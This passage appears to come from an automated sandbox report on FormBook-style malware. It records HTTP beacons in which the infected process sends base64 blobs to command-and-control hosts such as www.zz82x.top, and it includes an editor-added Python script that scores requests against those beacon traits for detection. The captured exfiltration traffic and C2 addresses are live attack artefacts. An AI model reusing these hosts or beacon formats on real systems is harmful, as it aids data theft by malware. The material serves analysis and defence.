                                Data Ascii: ;QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9!GnE="w}[h?8g*;q@Y8? q@&M[8`}e;+B7K-yOv;%38TZB}Ax=ZitssmoeYdgu'PFi.:?4XWCN2>dg3*M62/C/gl]CFR@JrCJ3O6:.$I9Zf"g>d@!gBw:T(<NjBWzF}6\+ `^f?T'I80Oq;1&cpk"nLa^qrz^>'<?vIz?'A8$RnW~^cRN}-abY-IxV_Yr*IRxqHym"5Q0/~tN\bdv ?
                                Sep 23, 2024 14:37:19.355983973 CEST | 1236 | IN | Data Raw: 44 b1 46 04 91 a4 ae 8a e9 3a 4b 57 45 4a 91 6a 66 2a 02 bb 70 03 fa 5a 41 2d 98 86 66 ef 64 00 ab aa 72 5f c2 e3 35 61 f2 e4 fe ba f9 41 86 fa 18 87 64 ac 85 47 d2 2a 71 20 65 e0 7b 43 c7 98 92 87 be d9 cc eb 87 be 69 db f9 43 df 22 6f 1f fa 82
                                Data Ascii: DF:KWEJjf*pZA-fdr_5aAdG*q e{CiC"o/Vb=8$M+,FDhitpv7zg,S^@ps\LyY"nIZvob{x>b9?=I8pcCnphZl36S}
                                Sep 23, 2024 14:37:19.355998039 CEST | 1236 | IN | Data Raw: 21 cb 93 70 31 0d 24 89 84 9c 4e a6 56 a4 3e 92 ed 68 b6 e0 69 6a 5b 66 4e a2 55 78 de b6 0a cf d4 d2 6a 85 5f 41 91 38 20 f4 fa 0d 4e d8 80 c7 1b 9c b0 e9 e0 84 4d b6 bb 9c 6c 6e 2f d4 00 66 f7 23 60 55 4c a5 5c b9 44 b1 6c 97 0c d8 8d 09 d7 24
                                Data Ascii: !p1$NV>hij[fNUxj_A8 NMln/f#`UL\Dl$V,(q-.\Yr #g=fpm3TFrDH}4SOy1VZ~Y9+A%vW2H5QRhg|,pr9kTb2;w:UQUQa~X
                                Sep 23, 2024 14:37:19.356062889 CEST | 1236 | IN | Data Raw: 69 a1 28 f2 f4 c1 23 b2 ac 3b 41 86 7a 24 a3 87 96 34 6b a5 5b 8d 83 99 0b 4f 1d 50 3c e4 7c 54 5e 52 74 73 c3 e4 37 b5 20 4b f0 98 a0 7d 08 2c 4e 55 7d 82 16 3c 37 71 31 36 09 a2 22 b5 b0 8e cb 6a f2 9f 63 61 cf 74 b8 48 94 56 e1 4b 83 70 9a 13
                                Data Ascii: i(#;Az$4k[OP<|T^Rts7 K},NU}<7q16"jcatHVKpwu',pk)MY&|l4"*nEU+E/wQ4[~Mw!kE`RK`\sEYqC+S%(_Jbm\ a1Ht:<`i/gVi0BW
                                Sep 23, 2024 14:37:19.356076002 CEST | 1236 | IN | Data Raw: 0d 24 52 8b 33 49 30 99 64 36 0e 4c 0e a2 e0 22 01 25 93 0d 03 e3 fe 79 ec ca c5 f1 61 75 88 ba 67 b9 a6 cc 4c 96 83 f3 83 cd c2 bc f8 b0 f9 b5 9b e2 6a 73 e8 f6 0b ae 27 fd bb 82 5c 7d 4a 8e 13 97 2d ec 17 cd 7f 44 d6 5c 6e c1 f5 34 4d 6f 8d e1
                                Data Ascii: $R3I0d6L"%yaugLjs'\}J-D\n4Moz^Dm]jaG!c,F!4y;&<+D\@[0W0*-Kdo\O@5xN=0E!Ws;LpD}M]hP2{=$O\]!
                                Sep 23, 2024 14:37:19.356168985 CEST | 1120 | IN | Data Raw: bc ac 4c 45 28 60 59 eb 1c 66 7a 63 cf 18 20 90 0a 6d 7e 79 00 61 c9 6b 49 28 88 f2 8d 9b 30 90 0c 6c 83 ff 2c b1 5e b2 14 d5 3b ba da 3e 3c c6 da e4 ef 16 be f9 dd b2 87 fc 0d 85 0d 66 5a 07 14 ab b9 ed 6e 0b 9f 5d f6 09 5a 1d 08 6f 84 a1 9e cf
                                Data Ascii: LE(`Yfzc m~yakI(0l,^;><fZn]Zos:Q4O{wNN%fX2R0]3+_;"wuOue7S'4suviR~2/9E!"KuKz+5'Q
                                Sep 23, 2024 14:37:19.356184006 CEST | 1236 | IN | Data Raw: a2 b1 b9 b8 3e 47 74 1b b5 42 ce 98 d4 62 09 aa bd 08 f5 f5 39 8a 77 39 ad 9c e7 28 09 50 c1 3e 4b a1 6d ef 1c 2c 11 ff 6d 9e 88 55 12 ed 86 2b e7 39 ea e8 65 d9 5b 39 cf d1 84 03 3b 6c 2c d1 97 78 d9 89 d2 15 7a 51 7c f7 b6 ff fe 77 8a cb 1b a9
                                Data Ascii: >GtBb9w9(P>Km,mU+9e[9;l,xzQ|wH6\=vHuWJ4eF>!-)ji:,6Sd5Z6%S*ZYQv-ek7oIlA$pr@u{|Brf:=->&s:9bj
                                Sep 23, 2024 14:37:19.356197119 CEST | 1236 | IN | Data Raw: 62 b0 34 8b ca b0 36 00 f9 56 3d 19 61 b4 d7 6e 8b 10 d8 47 a1 6f f7 c8 e8 b2 39 f6 39 d2 db dd 9c e3 b8 13 a5 ee 74 11 1b 28 42 f7 7c 94 3d 0c 29 c7 b0 91 87 45 10 d8 51 09 4c 49 b1 11 bc 67 1d 2f 15 a6 a8 5a 27 03 bc bb 87 5d 1a 97 59 93 d4 1d
                                Data Ascii: b46V=anGo99t(B|=)EQLIg/Z']YX{8wv7mjy4%{?N1U2LI]s)sm4#.#=UIaP\[X=AbN'i&]D(A~fQx!CP}dBA{:
                                Sep 23, 2024 14:37:19.356291056 CEST | 1236 | IN | Data Raw: be aa 67 14 59 b7 db 1d 9d 33 6e c1 17 a0 4a bd 63 8f 0d 3d 97 be ad c8 13 92 9d 05 be cc b1 a6 06 b2 bb 22 1a 95 e8 36 89 d9 97 58 47 68 85 0b 64 07 07 37 84 8a 4b 03 88 f6 b3 7e c1 b1 23 a3 b8 57 0a b2 c0 2a 66 44 df 08 d4 43 b4 31 12 19 ef 0a
                                Data Ascii: gY3nJc="6XGhd7K~#W*fDC1$"-`l9\)<ndMI|Zh"e[X.$Ef<P38"sHvvEUZR!r,+DC(9(53likXr6`
                                Sep 23, 2024 14:37:19.356303930 CEST | 1020 | IN | Data Raw: cf 82 a0 c5 13 38 45 80 65 42 b6 cb 6c 93 ef 6f 56 b8 8a 5f 63 bf 97 78 90 0e 57 88 6c de ef 3b 19 b8 28 f2 1b 4c 4d d4 25 cc ea 1e 45 d1 5d d6 09 a9 63 b8 ba ee 39 3c cb d8 f6 18 eb 65 1c b5 ae c8 e4 41 fb 74 b9 c9 cd 3d dd 2c 72 5e 71 c0 97 69
                                Data Ascii: 8EeBloV_cxWl;(LM%E]c9<eAt=,r^qiUFSq,d+-L=4,c&m`96ynZ2\Z\,f49is$6q&9i_y/bgi]h/8G''qPjO@88'Q1


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                4 | 192.168.2.7 | 49708 | 103.21.221.48 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:37:20.576164007 CEST | 487 | OUT | GET /phdl/?76=RacNMaTPN8PTLvXR9NF5eW2iQDieTkk5np6gf4eeXsIapVFDjThj3jiQkVzZmExioktz4vqZ0cfToK8eCYqJupED41Yr5DEkLX4m9t/uleGnewHbryEHDsS5u5fKmXjTxI+rab/4BaXG&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.tempatmudisini01.click
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:37:21.769678116 CEST | 543 | IN | HTTP/1.1 301 Moved Permanently
                                Connection: close
                                x-powered-by: PHP/7.4.33
                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                cache-control: no-cache, must-revalidate, max-age=0
                                content-type: text/html; charset=UTF-8
                                x-redirect-by: WordPress
                                location: http://tempatmudisini01.click/phdl/?76=RacNMaTPN8PTLvXR9NF5eW2iQDieTkk5np6gf4eeXsIapVFDjThj3jiQkVzZmExioktz4vqZ0cfToK8eCYqJupED41Yr5DEkLX4m9t/uleGnewHbryEHDsS5u5fKmXjTxI+rab/4BaXG&mtJD_=fvdlJ2L
                                x-litespeed-cache: miss
                                content-length: 0
                                date: Mon, 23 Sep 2024 12:37:21 GMT
                                server: LiteSpeed
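
                                The sessions above share one shape: a POST (or, in session 4, a GET) to a short path such as /phdl/ or /2lu6/, a single form field with a numeric name ("76") carrying a base64 blob, the same hard-coded Windows NT 6.1 / Chrome 17 User-Agent on every request, Connection: close, and on the POSTs a Referer equal to Origin plus the path; the servers answer with a stock nginx 404, a LiteSpeed/WordPress 404 or a 301. The script below is an added example by the editor, not code from the Joe Sandbox report and not the malware's own code. It parses raw requests of that shape, checks that the "Data Raw" hex and the "Data Ascii" line are the same bytes, and scores each request against those traits. POST_BEACON and GET_BEACON are re-typed from sessions 1 and 4 (headers abridged to the ones the scorer reads); BENIGN, the trait list and the scoring are the editor's own constructions, not a published FormBook signature.

```python
"""Score raw HTTP requests against the beacon traits seen in the sessions above.

Editor's added example: not part of the Joe Sandbox report and not FormBook's
own code. POST_BEACON and GET_BEACON are re-typed (headers abridged) from
sessions 1 and 4 on this page; BENIGN, the trait list and the scoring are the
editor's own constructions, not a published signature.
"""
import base64
import re
from urllib.parse import urlsplit

# User-Agent string sent verbatim by every request captured in this report.
STATIC_UA = ("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 "
             "(KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
SHORT_PATH_RE = re.compile(r"^/[a-z0-9]{2,8}/$")     # /phdl/, /2lu6/


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in filter(None, lines[1:]):
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def hexdump_to_bytes(hexdump):
    """Turn a report 'Data Raw' line ('37 36 3d ...') back into bytes."""
    return bytes.fromhex(hexdump.replace(" ", ""))


def split_form(encoded):
    """Split k=v&k=v without percent-decoding: parse_qsl would turn the literal
    '+' inside the base64 into a space (a browser form would have sent %2B)."""
    return [tuple(p.partition("=")[::2]) for p in encoded.split("&") if p]


def beacon_field(method, target, body):
    """Return the single (numeric-name, base64-value) pair of a beacon, or None."""
    encoded = body if method == "POST" else urlsplit(target).query
    hits = [(k, v) for k, v in split_form(encoded) if k.isdigit() and B64_RE.match(v)]
    return hits[0] if len(hits) == 1 else None


def beacon_summary(raw):
    """Parse one request and count how many of the shared traits it shows."""
    method, target, headers, body = parse_request(raw)
    path = urlsplit(target).path
    field = beacon_field(method, target, body)
    origin = headers.get("origin", "")
    traits = {
        "static_chrome17_ua": headers.get("user-agent") == STATIC_UA,
        "connection_close": headers.get("connection", "").lower() == "close",
        "short_random_path": SHORT_PATH_RE.match(path) is not None,
        "numeric_b64_field": field is not None,
        "referer_is_own_path": bool(origin) and headers.get("referer") == origin + path,
        "unencoded_plus_in_b64": field is not None and "+" in field[1],
    }
    payload_len = None
    if field is not None:
        padded = field[1] + "=" * (-len(field[1]) % 4)   # the GET variant sends no '='
        payload_len = len(base64.b64decode(padded))
    declared = int(headers.get("content-length", "-1"))
    return {"method": method, "host": headers.get("host"), "path": path,
            "field": field[0] if field else None, "payload_len": payload_len,
            "length_matches": method != "POST" or declared == len(body),
            "traits": traits, "score": sum(traits.values())}


POST_BEACON = """POST /phdl/ HTTP/1.1
Host: www.tempatmudisini01.click
Origin: http://www.tempatmudisini01.click
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Connection: close
Referer: http://www.tempatmudisini01.click/phdl/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11

76=cY0tPtnQJ+/2ZbKE6YI2bFK8UDihSi887KnqcY/wc6xgsH86nngw0wn0wlzXm29DqBBUufWCxunC/4osELOWgdQS4GYeyg0XIjAL4qroguKRPULdsWkfA860rY2TsCqg+e26SabJC/nREJ2923g0vjU7hYnjP03YVjm+cqB8oSHbhp0wMrUkyhwOIXtFduCn/myx8qhzdgifPUNNAg=="""

GET_BEACON = """GET /phdl/?76=RacNMaTPN8PTLvXR9NF5eW2iQDieTkk5np6gf4eeXsIapVFDjThj3jiQkVzZmExioktz4vqZ0cfToK8eCYqJupED41Yr5DEkLX4m9t/uleGnewHbryEHDsS5u5fKmXjTxI+rab/4BaXG&mtJD_=fvdlJ2L HTTP/1.1
Host: www.tempatmudisini01.click
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
"""

# Editor-constructed ordinary browser request, for contrast (not from the report).
BENIGN = """GET /index.html HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: keep-alive

"""

if __name__ == "__main__":
    for name, req in (("session 1", POST_BEACON), ("session 4", GET_BEACON), ("benign", BENIGN)):
        s = beacon_summary(req)
        print(f"{name}: {s['method']} {s['host']}{s['path']} score={s['score']}/6 "
              f"field={s['field']} payload={s['payload_len']} bytes")
```

                                Run with python3; it prints one line per sample: 6/6 for the session 1 POST, 5/6 for the session 4 GET (no Origin or Referer on that request) and 0/6 for the benign request. Two details matter when reusing this on other captures: the beacons write the base64 with a literal "+" and "/" rather than the %2B and %2F an application/x-www-form-urlencoded body from a browser would contain, so a form parser that percent-decodes will corrupt the blob (hence split_form), and the GET variant omits base64 padding, so pad to a multiple of four before decoding. The decoded lengths (157 bytes for the POST, 105 for the GET) are what a full FormBook decoder would be fed; decrypting them is outside what this page shows and is not attempted here.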


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                5 | 192.168.2.7 | 49709 | 38.47.232.196 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:37:27.333808899 CEST | 731 | OUT | POST /2lu6/ HTTP/1.1
                                Host: www.zz82x.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.zz82x.top
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.zz82x.top/2lu6/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 43 5a 6f 54 33 79 54 54 4e 6f 42 49 68 78 34 71 37 4b 31 69 5a 4e 79 73 6d 7a 58 66 42 6a 48 37 35 39 74 47 73 75 32 47 5a 50 46 7a 33 5a 77 42 61 71 33 2f 31 6a 72 42 54 77 61 68 58 70 35 4e 37 61 76 43 56 6b 63 50 33 4e 72 64 74 6d 35 65 4f 70 33 41 6b 2f 65 45 68 5a 55 70 57 51 69 44 61 4c 76 41 7a 70 32 4c 6d 6c 2b 70 33 32 49 6d 2f 30 76 4d 39 30 30 30 52 6c 38 2f 6d 56 4d 74 6e 75 33 50 62 59 4d 43 50 48 53 37 79 78 70 45 45 57 34 66 38 58 4a 65 30 76 78 4f 66 79 6d 75 49 72 59 78 2b 6d 43 58 73 4d 4f 57 4b 32 6a 38 6a 78 69 54 6d 75 34 76 67 77 4a 6f 49 46 78 52 45 67 2f 54 4f 43 68 49 4a 36 48 5a 79 4b 39 51 6d 41 3d 3d
                                Data Ascii: 76=CZoT3yTTNoBIhx4q7K1iZNysmzXfBjH759tGsu2GZPFz3ZwBaq3/1jrBTwahXp5N7avCVkcP3Nrdtm5eOp3Ak/eEhZUpWQiDaLvAzp2Lml+p32Im/0vM9000Rl8/mVMtnu3PbYMCPHS7yxpEEW4f8XJe0vxOfymuIrYx+mCXsMOWK2j8jxiTmu4vgwJoIFxREg/TOChIJ6HZyK9QmA==
                                Sep 23, 2024 14:37:28.123538017 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:37:27 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                6           192.168.2.7  49710        38.47.232.196   80                3040  C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp                             Bytes transferred  Direction  Data
                                Sep 23, 2024 14:37:29.880053043 CEST  751                OUT        POST /2lu6/ HTTP/1.1
                                Host: www.zz82x.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.zz82x.top
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.zz82x.top/2lu6/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 43 5a 6f 54 33 79 54 54 4e 6f 42 49 67 52 6f 71 35 72 31 69 66 74 79 76 6a 7a 58 66 50 44 48 2f 35 39 70 47 73 72 58 64 59 39 68 7a 33 37 6f 42 49 59 66 2f 34 44 72 42 5a 51 61 67 54 70 35 45 37 61 6a 67 56 6d 34 50 33 4e 2f 64 74 69 78 65 50 65 62 48 69 2f 65 47 30 4a 56 76 53 51 69 44 61 4c 76 41 7a 74 66 6b 6d 6c 32 70 30 47 34 6d 2b 51 62 44 31 55 30 33 55 6c 38 2f 73 31 4e 6d 6e 75 33 78 62 5a 52 4b 50 45 71 37 79 31 6c 45 45 6e 34 63 32 58 49 58 70 66 78 59 55 67 75 67 47 4a 77 66 36 58 47 44 70 4f 4c 30 47 67 2b 65 35 54 75 2f 34 2f 41 55 6b 79 74 65 66 6a 73 6b 47 68 37 4c 44 67 56 70 57 4e 69 7a 2f 59 63 55 77 2f 66 4a 7a 5a 4c 73 4a 6a 38 43 43 50 4f 7a 51 50 2f 48 6e 72 59 3d
                                Data Ascii: 76=CZoT3yTTNoBIgRoq5r1iftyvjzXfPDH/59pGsrXdY9hz37oBIYf/4DrBZQagTp5E7ajgVm4P3N/dtixePebHi/eG0JVvSQiDaLvAztfkml2p0G4m+QbD1U03Ul8/s1Nmnu3xbZRKPEq7y1lEEn4c2XIXpfxYUgugGJwf6XGDpOL0Gg+e5Tu/4/AUkytefjskGh7LDgVpWNiz/YcUw/fJzZLsJj8CCPOzQP/HnrY=
                                Sep 23, 2024 14:37:30.782752037 CEST  691                IN         HTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:37:30 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                7           192.168.2.7  49711        38.47.232.196   80                3040  C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp                             Bytes transferred  Direction  Data
                                Sep 23, 2024 14:37:32.428009987 CEST  1764               OUT        POST /2lu6/ HTTP/1.1
                                Host: www.zz82x.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.zz82x.top
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.zz82x.top/2lu6/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 43 5a 6f 54 33 79 54 54 4e 6f 42 49 67 52 6f 71 35 72 31 69 66 74 79 76 6a 7a 58 66 50 44 48 2f 35 39 70 47 73 72 58 64 59 39 70 7a 33 49 67 42 5a 4f 58 2f 35 44 72 42 43 51 61 6c 54 70 34 57 37 5a 54 6b 56 6d 45 66 33 50 48 64 74 46 78 65 49 72 76 48 33 50 65 47 72 35 55 6f 57 51 69 53 61 4c 2f 45 7a 70 37 6b 6d 6c 32 70 30 45 77 6d 33 6b 76 44 33 55 30 30 52 6c 38 6a 6d 56 4d 42 6e 71 53 4b 62 5a 56 61 50 56 4b 37 79 56 31 45 58 31 41 63 36 58 49 56 71 66 77 62 55 67 7a 69 47 4a 73 54 36 58 69 70 70 4f 7a 30 45 57 44 6c 76 58 75 43 6b 2b 6b 4e 6e 41 31 46 56 6c 39 54 50 6a 44 70 4d 67 35 38 61 73 36 51 36 62 6f 44 6b 50 50 46 72 49 76 46 52 68 45 47 47 37 37 46 46 2f 44 68 6c 50 6e 62 68 7a 4c 75 4b 7a 75 45 33 50 2b 71 73 66 7a 6c 78 30 75 4d 77 55 46 67 5a 45 61 5a 43 53 43 48 4b 50 72 44 41 51 66 57 44 4f 4c 4b 34 6c 66 78 38 4c 67 72 52 53 4b 48 2f 6f 38 4b 6d 68 30 6a 6d 74 34 4d 36 74 2b 34 57 54 73 72 6e 55 31 2b 4c 39 57 62 6f 31 72 4b 6e 57 34 6d 67 34 5a 36 6c 46 51 70 71 75 66 [TRUNCATED]
                                Data Ascii: 76=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 [TRUNCATED]
                                Sep 23, 2024 14:37:33.546189070 CEST  691                IN         HTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:37:33 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                8           192.168.2.7  49712        38.47.232.196   80                3040  C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp                             Bytes transferred  Direction  Data
                                Sep 23, 2024 14:37:34.967307091 CEST  474                OUT        GET /2lu6/?76=PbAz0EfTKowYn11d9L8KeIyoxyngBHbvlbcT88jVQuwl479Ud/v94CC+Ex+uZY8Wq5vHWUIm1erRj2VcHYbUz5WJs9RaUjKCQ9bJpumP+lrR5hAi4gPt8UgQTkM/uAhjmqXAbZ9LXA/l&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.zz82x.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
